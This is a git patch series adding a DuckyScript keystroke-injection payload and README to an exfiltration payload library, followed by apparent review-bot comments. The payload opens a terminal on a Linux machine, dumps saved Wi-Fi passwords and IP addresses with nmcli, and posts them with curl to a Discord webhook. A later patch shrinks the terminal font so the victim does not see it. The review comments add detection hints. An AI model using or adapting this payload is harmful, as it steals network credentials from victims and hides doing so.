From 309209c29d211ba634125ee1dd91120e1b20f794 Mon Sep 17 00:00:00 2001
From: Simen <97337442+simen64@users.noreply.github.com>
Date: Fri, 24 May 2024 23:46:30 +0200
Subject: [PATCH 1/3] Create payload.txt
---
 .../Wifi-Creds-Discord-Linux/payload.txt | 42 +++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
diff --git a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
new file mode 100644
index 00000000..e72775c4
--- /dev/null
+++ b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
@@ -0,0 +1,42 @@
+REM_BLOCK
+###############################################
+# |
+# Title : Get Linux wifi credentials |
+# Author : simen64 |
+# Version : 1.0 |
+# Category : Exfiltration |
+# Target : Linux |
+# |
+###############################################
+END_REM
+
+REM change to your keyboard layout
+DUCKY_LANG NO
+
+REM put your discord webhook here
+DEFINE #dc webhook here
+
+DELAY 2000
+CAPSLOCK_DISABLE
+DEFAULT_DELAY 10
+
+REM_BLOCK
+Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
+ALT F2
+DELAY 200
+STRINGLN xterm
+DELAY 500
+END_REM
+
+REM_BLOCK
+Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
+CTRL-ALT t
+DELAY 500
+END_REM
+
+STRING output=$(nmcli dev wifi show-password && nmcli | grep "inet4\|inet6" | grep -v "127.0.0.1\|::1" | sed 's/
+CTRL v
+TAB
+STRINGLN //')
+STRINGLN escaped_output=$(printf '%s' "$output" | jq -sRr @json)
+STRINGLN curl -H "Content-Type: application/json" -d "{\"username\": \"Wifi grabber\", \"content\": $escaped_output}" "#dc" && exit
From 6f434b384d9da8717a951d8b4c2350482f056ea9 Mon Sep 17 00:00:00 2001
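Review bot: The header block and the setup comments never state what this file executes on the host or where the collected data ends up, which is the first thing anyone auditing the payload library needs to see. The last six lines of the hunk type a shell pipeline that runs `nmcli dev wifi show-password`, `jq` and `curl` and POSTs the Wi-Fi passphrase (and, it appears, the interface addresses) to the `#dc` webhook, i.e. to a third-party service outside the operator's control; a header line such as `REM Runs nmcli, jq and curl; sends the active Wi-Fi PSK and IP addresses to the webhook in #dc` would record that. Because the commands are typed into an interactive shell, the full command line including the webhook URL would normally remain in that user's shell history, and the upload is visible as an outbound POST to the webhook host, both of which are useful for detection and incident scoping.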
From: Simen <97337442+simen64@users.noreply.github.com>
Date: Fri, 24 May 2024 23:49:49 +0200
Subject: [PATCH 2/3] Create README.md
---
 .../Wifi-Creds-Discord-Linux/README.md | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md
diff --git a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md
new file mode 100644
index 00000000..a9cd8c52
--- /dev/null
+++ b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md
@@ -0,0 +1,35 @@
+# Exfiltrate wifi creds of a linux system to a discord webhook
+
+This payload grabs the wifi credentials on a linux system and sens it to you with a discord webhook.
+
+## Getting started
+
+### Dependencies
+- Linux
+- Bash
+- Network Manager
+
+### Prerequisites
+
+If your target uses Gnome, uncomment this line in the payload (uncomment by removing `REM_BLOCK` and `END_REM`:
+```
+REM_BLOCK
+Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
+ALT F2
+DELAY 200
+STRINGLN xterm
+DELAY 500
+END_REM
+```
+
+If your target uses a DE or WM that lets you open a terminal with ctrl-alt-t uncomment this line:
+```
+REM_BLOCK
+Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
+CTRL-ALT t
+DELAY 500
+END_REM
+```
+
+## Settings
+- #dc your discord webhook
From 70fb09b6e6c4f1bec29e152d25502e6247d0baac Mon Sep 17 00:00:00 2001
From: Simen <97337442+simen64@users.noreply.github.com>
Date: Mon, 12 Aug 2024 23:39:23 +0200
Subject: [PATCH 3/3] Add xterm option for making window smaller
---
 .../library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
index e72775c4..8f157bd0 100644
--- a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
+++ b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
@@ -24,7 +24,7 @@ REM_BLOCK
 Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
 ALT F2
 DELAY 200
-STRINGLN xterm
+STRINGLN xterm -fa monaco -fs 1
 DELAY 500
 END_REM
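Review bot: The README added in patch 2/3 still quotes the Gnome block with `STRINGLN xterm`, so after this change the documented block no longer matches payload.txt. The new flags are also unexplained in the file itself: going by the commit subject, `-fa monaco -fs 1` is there to make the terminal window very small, and a line such as `REM -fa monaco -fs 1 sets font size 1 so the xterm window opens very small` next to it would make that intent explicit to anyone reviewing the payload. For defenders, an `xterm` launched with `-fs 1` is an unusual command line and a reasonable thing to alert on in process telemetry. The REM_BLOCK this line belongs to opens above the hunk.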